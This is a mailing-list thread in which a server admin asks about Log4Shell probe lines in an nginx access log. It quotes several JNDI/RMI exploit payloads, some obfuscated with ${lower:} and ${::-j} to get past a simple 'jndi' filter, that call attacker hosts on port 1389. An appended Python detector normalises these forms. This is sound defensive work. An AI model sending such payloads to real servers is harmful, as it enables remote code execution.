200 html return to log4j exploit

lists at lazygranch.com
Mon Dec 20 19:08:25 UTC 2021



On Mon, 20 Dec 2021 17:49:48 +0000
Jay Caines-Gooby <jay at gooby.org> wrote:

> The request is for your index page "GET / HTTP/1.1"; that's why your
> server responded with 200 OK. The special characters are in the
> referer and user-agent fields, as a log4j system would also try to
> interpolate these, and thus be vulnerable to the exploit.
> 
> On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com
> <lists at lazygranch.com> wrote:
> 
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. However I am confused why it returned a 200 for
> > this request. The special characters in the URL are confusing.
> >
> > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET /
> > HTTP/1.1" 706
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}"
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"
> >
> >     log_format  main  '$status $remote_addr - $remote_user
> >     [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> >                       '"$http_user_agent" "$http_x_forwarded_for"';
> >
> > That is my log format from the nginx.conf.
> >
> > I now have a map to catch "jndi" in both url and agent. So far so
> > good not that it matters much. I just like to gather IP addresses
> > from hackers and block their host if it lacks eyeballs,


Thanks for both replies. Note the hackers have done a work around to
get past my simple "map" detection. Matching jndi is not
sufficient. Examples:

103.107.245.1 - - [20/Dec/2021:14:38:15 +0000] "GET / HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"

103.107.245.1 - - [20/Dec/2021:14:38:16 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"

I can't really tell if this Indonesian IP address is an ISP or not, so I guess I will let them slide from the firewall. The other IP is for Digital Ocean. I have some droplets there and yeah, there are bad actors on the service. Kind of sad I have to block the vendor I use, but probably AWS, Linode, etc. are just as bad. For the price of the service you simply can't police it at scale.

Probably another stupid question but what is up with this ${ stuff? I
need some terminology to google and read up on this. 
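As an added example (not part of the thread): the `${...}` expressions are Log4j 2 "lookups", and both `${lower:jndi}` and `${::-j}` (a default-value expression that evaluates to the literal `j`) rebuild the string `jndi` only at evaluation time, which is why a literal "jndi" match in an nginx map misses them. The Python below, using constructed log lines in the thread's nginx `main` log_format with RFC 5737 documentation addresses, collapses those forms and URL-encoding before matching.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the thread's nginx "main" log_format
# ($status $remote_addr ... "$request" $body_bytes_sent "$http_referer" "$http_user_agent" ...).
# Addresses are RFC 5737 documentation ranges, not the real ones from the thread.
SAMPLE_LOG_LINES = [
    # lower-case lookup obfuscation in the referer field
    '200 192.0.2.10 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 '
    '"${${lower:jndi}:${lower:rmi}://198.51.100.7:1389/abc}" "Mozilla/5.0" "-"',
    # default-value obfuscation, URL-encoded in the query string; contains no literal "jndi"
    '200 192.0.2.11 - - [20/Dec/2021:14:38:16 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Armi%3A%2F%2F198.51.100.7%3A1389%2FBinary%7D HTTP/1.1" 706 "-" "curl/7.68.0" "-"',
    # benign request
    '200 192.0.2.12 - - [20/Dec/2021:14:40:00 +0000] "GET /index.html HTTP/1.1" 706 '
    '"https://example.com/" "Mozilla/5.0" "-"',
]

# ${lower:x} / ${upper:x} evaluate to x (case changed); ${...:-x} evaluates to the default x
LOWER_UPPER = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)
DEFAULT_VALUE = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:')


def normalise(text, max_rounds=10):
    """Decode URL-encoding, then collapse nested lookups innermost-first until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = LOWER_UPPER.sub(lambda m: m.group(1), text)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text.lower()


def naive_match(line):
    """The literal substring test the thread's map performs."""
    return 'jndi' in line.lower()


def is_jndi_probe(line):
    """True when the line contains a ${jndi:...} lookup after normalisation."""
    return bool(JNDI_LOOKUP.search(normalise(line)))


def flagged_addresses(lines):
    """Client addresses (second field of the 'main' format) of lines carrying a JNDI lookup."""
    return [line.split()[1] for line in lines if is_jndi_probe(line)]


if __name__ == '__main__':
    for line in SAMPLE_LOG_LINES:
        print(f'naive={naive_match(line)!s:5} normalised={is_jndi_probe(line)!s:5} {line[:60]}')
```

The second sample line shows the gap: the literal test misses it, while matching on the normalised text catches both obfuscated forms and leaves the benign request alone.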

